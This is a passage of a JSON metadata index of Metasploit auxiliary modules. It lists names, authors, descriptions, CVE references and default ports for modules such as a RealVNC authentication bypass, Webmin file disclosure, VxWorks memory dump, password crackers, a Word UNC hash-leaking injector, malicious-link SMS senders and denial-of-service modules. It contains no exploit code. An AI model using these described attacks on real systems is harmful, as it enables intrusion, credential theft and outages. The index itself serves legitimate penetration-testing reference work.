"path": "/modules/auxiliary/admin/upnp/soap_portmapping.rb",
"is_install_path": true,
"ref_name": "admin/upnp/soap_portmapping",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/vmware/poweroff_vm": {
"name": "VMWare Power Off Virtual Machine",
"full_name": "auxiliary/admin/vmware/poweroff_vm",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will log into the Web API of VMWare and try to power off\n a specified Virtual Machine.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vmware/poweroff_vm.rb",
"is_install_path": true,
"ref_name": "admin/vmware/poweroff_vm",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/vmware/poweron_vm": {
"name": "VMWare Power On Virtual Machine",
"full_name": "auxiliary/admin/vmware/poweron_vm",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will log into the Web API of VMWare and try to power on\n a specified Virtual Machine.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vmware/poweron_vm.rb",
"is_install_path": true,
"ref_name": "admin/vmware/poweron_vm",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/vmware/tag_vm": {
"name": "VMWare Tag Virtual Machine",
"full_name": "auxiliary/admin/vmware/tag_vm",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will log into the Web API of VMWare and\n 'tag' a specified Virtual Machine. It does this by\n logging a user event with user supplied text",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vmware/tag_vm.rb",
"is_install_path": true,
"ref_name": "admin/vmware/tag_vm",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/vmware/terminate_esx_sessions": {
"name": "VMWare Terminate ESX Login Sessions",
"full_name": "auxiliary/admin/vmware/terminate_esx_sessions",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will log into the Web API of VMWare and try to terminate\n user login sessions as specified by the session keys.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb",
"is_install_path": true,
"ref_name": "admin/vmware/terminate_esx_sessions",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/vnc/realvnc_41_bypass": {
"name": "RealVNC NULL Authentication Mode Bypass",
"full_name": "auxiliary/admin/vnc/realvnc_41_bypass",
"rank": 300,
"disclosure_date": "2006-05-15",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module exploits an Authentication bypass Vulnerability\n in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy\n listener on LPORT and proxies to the target server\n\n The AUTOVNC option requires that vncviewer be installed on\n the attacking machine.",
"references": [
"BID-17978",
"OSVDB-25479",
"URL-http://secunia.com/advisories/20107/",
"CVE-2006-2369"
],
"platform": "",
"arch": "",
"rport": 5900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb",
"is_install_path": true,
"ref_name": "admin/vnc/realvnc_41_bypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/vxworks/apple_airport_extreme_password": {
"name": "Apple Airport Extreme Password Extraction (WDBRPC)",
"full_name": "auxiliary/admin/vxworks/apple_airport_extreme_password",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to read the stored password of a vulnerable\n Apple Airport Extreme access point. Only a small number of firmware versions\n have the WDBRPC service running, however the factory configuration was\n vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are\n susceptible to this issue. Once the password is obtained, the access point\n can be managed using the Apple AirPort utility.",
"references": [
"OSVDB-66842",
"URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb",
"is_install_path": true,
"ref_name": "admin/vxworks/apple_airport_extreme_password",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/vxworks/dlink_i2eye_autoanswer": {
"name": "D-Link i2eye Video Conference AutoAnswer (WDBRPC)",
"full_name": "auxiliary/admin/vxworks/dlink_i2eye_autoanswer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to enable auto-answer mode for the D-Link\n i2eye video conferencing system. Once this setting has been flipped,\n the device will accept incoming video calls without acknowledgement.\n The NetMeeting software included in Windows XP can be used to connect\n to this device. The i2eye product is no longer supported by the vendor\n and all models have reached their end of life (EOL).",
"references": [
"OSVDB-66842",
"URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb",
"is_install_path": true,
"ref_name": "admin/vxworks/dlink_i2eye_autoanswer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/vxworks/wdbrpc_memory_dump": {
"name": "VxWorks WDB Agent Remote Memory Dump",
"full_name": "auxiliary/admin/vxworks/wdbrpc_memory_dump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module provides the ability to dump the system memory of a VxWorks target through WDBRPC",
"references": [
"OSVDB-66842",
"URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb",
"is_install_path": true,
"ref_name": "admin/vxworks/wdbrpc_memory_dump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/vxworks/wdbrpc_reboot": {
"name": "VxWorks WDB Agent Remote Reboot",
"full_name": "auxiliary/admin/vxworks/wdbrpc_reboot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module provides the ability to reboot a VxWorks target through WDBRPC",
"references": [
"OSVDB-66842",
"URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb",
"is_install_path": true,
"ref_name": "admin/vxworks/wdbrpc_reboot",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/webmin/edit_html_fileaccess": {
"name": "Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access",
"full_name": "auxiliary/admin/webmin/edit_html_fileaccess",
"rank": 300,
"disclosure_date": "2012-09-06",
"type": "auxiliary",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal in Webmin 1.580. The vulnerability\n exists in the edit_html.cgi component and allows an authenticated user with access\n to the File Manager Module to access arbitrary files with root privileges. The\n module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.",
"references": [
"OSVDB-85247",
"BID-55446",
"CVE-2012-2983",
"URL-http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf",
"URL-https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80"
],
"platform": "",
"arch": "",
"rport": 10000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb",
"is_install_path": true,
"ref_name": "admin/webmin/edit_html_fileaccess",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/webmin/file_disclosure": {
"name": "Webmin File Disclosure",
"full_name": "auxiliary/admin/webmin/file_disclosure",
"rank": 300,
"disclosure_date": "2006-06-30",
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "A vulnerability has been reported in Webmin and Usermin, which can be\n exploited by malicious people to disclose potentially sensitive information.\n The vulnerability is caused due to an unspecified error within the handling\n of an URL. This can be exploited to read the contents of any files on the\n server via a specially crafted URL, without requiring a valid login.\n The vulnerability has been reported in Webmin (versions prior to 1.290) and\n Usermin (versions prior to 1.220).",
"references": [
"OSVDB-26772",
"BID-18744",
"CVE-2006-3392",
"US-CERT-VU-999601",
"URL-http://secunia.com/advisories/20892/"
],
"platform": "",
"arch": "",
"rport": 10000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/webmin/file_disclosure.rb",
"is_install_path": true,
"ref_name": "admin/webmin/file_disclosure",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/wemo/crockpot": {
"name": "Belkin Wemo-Enabled Crock-Pot Remote Control",
"full_name": "auxiliary/admin/wemo/crockpot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module acts as a simple remote control for Belkin Wemo-enabled\n Crock-Pots by implementing a subset of the functionality provided by the\n Wemo App.\n\n No vulnerabilities are exploited by this Metasploit module in any way.",
"references": [
"URL-https://www.crock-pot.com/wemo-landing-page.html",
"URL-https://www.belkin.com/us/support-article?articleNum=101177",
"URL-http://www.wemo.com/"
],
"platform": "",
"arch": "",
"rport": 49152,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-04 19:25:56 +0000",
"path": "/modules/auxiliary/admin/wemo/crockpot.rb",
"is_install_path": true,
"ref_name": "admin/wemo/crockpot",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"physical-effects"
]
}
},
"auxiliary_admin/zend/java_bridge": {
"name": "Zend Server Java Bridge Design Flaw Remote Code Execution",
"full_name": "auxiliary/admin/zend/java_bridge",
"rank": 300,
"disclosure_date": "2011-03-28",
"type": "auxiliary",
"author": [
"ikki",
"MC <mc@metasploit.com>"
],
"description": "This module abuses a flaw in the Zend Java Bridge Component of\n the Zend Server Framework. By sending a specially crafted packet, an\n attacker may be able to execute arbitrary code.\n\n NOTE: This module has only been tested with the Win32 build of the software.",
"references": [
"OSVDB-71420",
"ZDI-11-113",
"EDB-17078"
],
"platform": "",
"arch": "",
"rport": 10001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/zend/java_bridge.rb",
"is_install_path": true,
"ref_name": "admin/zend/java_bridge",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/apply_pot": {
"name": "Apply Pot File To Hashes",
"full_name": "auxiliary/analyze/apply_pot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"h00die"
],
"description": "This module uses a John the Ripper or Hashcat .pot file to crack any password\n hashes in the creds database instantly. JtR's --show functionality is used to\n help combine all the passwords into an easy to use format.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/apply_pot.rb",
"is_install_path": true,
"ref_name": "analyze/apply_pot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_aix": {
"name": "John the Ripper AIX Password Cracker",
"full_name": "auxiliary/analyze/jtr_aix",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module uses John the Ripper to identify weak passwords that have been\n acquired from passwd files on AIX systems. These utilize DES hashing.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_aix.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_aix",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_linux": {
"name": "John the Ripper Linux Password Cracker",
"full_name": "auxiliary/analyze/jtr_linux",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module uses John the Ripper to identify weak passwords that have been\n acquired from unshadowed passwd files from Unix systems. The module will only crack\n MD5, BSDi and DES implementations by default. Set Crypt to true to also try to crack\n Blowfish and SHA(256/512). Warning: This is much slower.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_linux.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_linux",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_mssql_fast": {
"name": "John the Ripper MS SQL Password Cracker (Fast Mode)",
"full_name": "auxiliary/analyze/jtr_mssql_fast",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module uses John the Ripper to identify weak passwords that have been\n acquired from the mssql_hashdump module. Passwords that have been successfully\n cracked are then saved as proper credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_mssql_fast.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_mssql_fast",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_mysql_fast": {
"name": "John the Ripper MySQL Password Cracker (Fast Mode)",
"full_name": "auxiliary/analyze/jtr_mysql_fast",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module uses John the Ripper to identify weak passwords that have been\n acquired from the mysql_hashdump module. Passwords that have been successfully\n cracked are then saved as proper credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_mysql_fast.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_mysql_fast",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_oracle_fast": {
"name": "John the Ripper Oracle Password Cracker (Fast Mode)",
"full_name": "auxiliary/analyze/jtr_oracle_fast",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module uses John the Ripper to identify weak passwords that have been\n acquired from the oracle_hashdump module. Passwords that have been successfully\n cracked are then saved as proper credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_oracle_fast.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_oracle_fast",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_postgres_fast": {
"name": "John the Ripper Postgres SQL Password Cracker",
"full_name": "auxiliary/analyze/jtr_postgres_fast",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module uses John the Ripper to attempt to crack Postgres password\n hashes, gathered by the postgres_hashdump module. It is slower than some of the other\n JtR modules because it has to do some wordlist manipulation to properly handle postgres'\n format.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_postgres_fast.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_postgres_fast",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_analyze/jtr_windows_fast": {
"name": "John the Ripper Windows Password Cracker (Fast Mode)",
"full_name": "auxiliary/analyze/jtr_windows_fast",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module uses John the Ripper to identify weak passwords that have been\n acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal\n of this module is to find trivial passwords in a short amount of time. To\n crack complex passwords or use large wordlists, John the Ripper should be\n used outside of Metasploit. This initial version just handles LM/NTLM credentials\n from hashdump and uses the standard wordlist and rules.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-21 20:54:32 +0000",
"path": "/modules/auxiliary/analyze/jtr_windows_fast.rb",
"is_install_path": true,
"ref_name": "analyze/jtr_windows_fast",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_bnat/bnat_router": {
"name": "BNAT Router",
"full_name": "auxiliary/bnat/bnat_router",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bannedit <bannedit@metasploit.com>",
"Jonathan Claudius"
],
"description": "This module will properly route BNAT traffic and allow for connections to be\n established to machines on ports which might not otherwise be accessible.",
"references": [
"URL-https://github.com/claudijd/bnat",
"URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/bnat/bnat_router.rb",
"is_install_path": true,
"ref_name": "bnat/bnat_router",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_bnat/bnat_scan": {
"name": "BNAT Scanner",
"full_name": "auxiliary/bnat/bnat_scan",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bannedit <bannedit@metasploit.com>",
"Jonathan Claudius <jclaudius@trustwave.com>"
],
"description": "This module is a scanner which can detect Broken NAT (network address translation)\n implementations, which could result in an inability to reach ports on remote\n machines. Typically, these ports will appear in nmap scans as 'filtered'/'closed'.",
"references": [
"URL-https://github.com/claudijd/bnat",
"URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/bnat/bnat_scan.rb",
"is_install_path": true,
"ref_name": "bnat/bnat_scan",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_client/hwbridge/connect": {
"name": "Hardware Bridge Session Connector",
"full_name": "auxiliary/client/hwbridge/connect",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Craig Smith"
],
"description": "The Hardware Bridge (HWBridge) is a standardized method for\n Metasploit to interact with Hardware Devices. This extends\n the normal exploit capabilities to the non-ethernet realm and\n enables direct hardware and alternative bus manipulations. You\n must have compatible bridging hardware attached to this machine or\n reachable on your network to use any HWBridge exploits.\n\n Use this exploit module to connect the physical HWBridge which\n will start an interactive hwbridge session. You can launch a hwbridge\n server locally by using compliant hardware and executing the local_hwbridge\n module. After that module has started, pass the HWBRIDGE_BASE_URL\n options to this connector module.",
"references": [
"URL-http://opengarages.org/hwbridge"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-09-11 18:30:34 +0000",
"path": "/modules/auxiliary/client/hwbridge/connect.rb",
"is_install_path": true,
"ref_name": "client/hwbridge/connect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_client/iec104/iec104": {
"name": "IEC104 Client Utility",
"full_name": "auxiliary/client/iec104/iec104",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Michael John <mjohn.info@gmail.com>"
],
"description": "This module allows sending 104 commands.",
"references": [
],
"platform": "",
"arch": "",
"rport": 2404,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-03 20:13:48 +0000",
"path": "/modules/auxiliary/client/iec104/iec104.rb",
"is_install_path": true,
"ref_name": "client/iec104/iec104",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_client/mms/send_mms": {
"name": "MMS Client",
"full_name": "auxiliary/client/mms/send_mms",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module sends an MMS message to multiple phones of the same carrier.\n You can use it to send a malicious attachment to phones.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/client/mms/send_mms.rb",
"is_install_path": true,
"ref_name": "client/mms/send_mms",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_client/sms/send_text": {
"name": "SMS Client",
"full_name": "auxiliary/client/sms/send_text",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module sends a text message to multiple phones of the same carrier.\n You can use it to send a malicious link to phones.\n\n Please note that you do not use this module to send a media file (attachment).\n In order to send a media file, please use auxiliary/client/mms/send_mms instead.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/client/sms/send_text.rb",
"is_install_path": true,
"ref_name": "client/sms/send_text",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_client/smtp/emailer": {
"name": "Generic Emailer (SMTP)",
"full_name": "auxiliary/client/smtp/emailer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module can be used to automate email delivery.\n This code is based on Joshua Abraham's email script for social\n engineering.",
"references": [
"URL-http://spl0it.org/"
],
"platform": "",
"arch": "",
"rport": "25",
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2019-01-24 13:49:22 +0000",
"path": "/modules/auxiliary/client/smtp/emailer.rb",
"is_install_path": true,
"ref_name": "client/smtp/emailer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_crawler/msfcrawler": {
"name": "Metasploit Web Crawler",
"full_name": "auxiliary/crawler/msfcrawler",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/crawler/msfcrawler.rb",
"is_install_path": true,
"ref_name": "crawler/msfcrawler",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_docx/word_unc_injector": {
"name": "Microsoft Word UNC Path Injector",
"full_name": "auxiliary/docx/word_unc_injector",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"SphaZ <cyberphaz@gmail.com>"
],
"description": "This module modifies a .docx file that will, upon opening, submit stored\n netNTLM credentials to a remote host. It can also create an empty docx file. If\n emailed the receiver needs to put the document in editing mode before the remote\n server will be contacted. Preview and read-only mode do not work. Verified to work\n with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.",
"references": [
"URL-http://jedicorp.com/?p=534"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/docx/word_unc_injector.rb",
"is_install_path": true,
"ref_name": "docx/word_unc_injector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/android/android_stock_browser_iframe": {
"name": "Android Stock Browser Iframe DOS",
"full_name": "auxiliary/dos/android/android_stock_browser_iframe",
"rank": 300,
"disclosure_date": "2012-12-01",
"type": "auxiliary",
"author": [
"Jean Pascal Pereira",
"Jonathan Waggoner"
],
"description": "This module exploits a vulnerability in the native browser that comes with Android 4.0.3.\n If successful, the browser will crash after viewing the webpage.",
"references": [
"PACKETSTORM-118539",
"CVE-2012-6301"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/android/android_stock_browser_iframe.rb",
"is_install_path": true,
"ref_name": "dos/android/android_stock_browser_iframe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/apple_ios/webkit_backdrop_filter_blur": {
"name": "iOS Safari Denial of Service with CSS",
"full_name": "auxiliary/dos/apple_ios/webkit_backdrop_filter_blur",
"rank": 300,
"disclosure_date": "2018-09-15",
"type": "auxiliary",
"author": [
"Sabri Haddouche"
],
"description": "This module exploits a vulnerability in WebKit on Apple iOS.\n If successful, the device will restart after viewing the webpage.",
"references": [
"URL-https://twitter.com/pwnsdx/status/1040944750973595649",
"URL-https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea",
"URL-https://nbulischeck.github.io/apple-safari-crash"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-24 17:10:13 +0000",
"path": "/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb",
"is_install_path": true,
"ref_name": "dos/apple_ios/webkit_backdrop_filter_blur",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/cisco/ios_http_percentpercent": {
"name": "Cisco IOS HTTP GET /%% Request Denial of Service",
"full_name": "auxiliary/dos/cisco/ios_http_percentpercent",
"rank": 300,
"disclosure_date": "2000-04-26",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module triggers a Denial of Service condition in the Cisco IOS\n HTTP server. By sending a GET request for \"/%%\", the device becomes\n unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module\n tested successfully against a Cisco 1600 Router IOS v11.2(18)P.",
"references": [
"BID-1154",
"CVE-2000-0380",
"OSVDB-1302"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb",
"is_install_path": true,
"ref_name": "dos/cisco/ios_http_percentpercent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/cisco/ios_telnet_rocem": {
"name": "Cisco IOS Telnet Denial of Service",
"full_name": "auxiliary/dos/cisco/ios_telnet_rocem",
"rank": 300,
"disclosure_date": "2017-03-17",
"type": "auxiliary",
"author": [
"Artem Kondratenko"
],
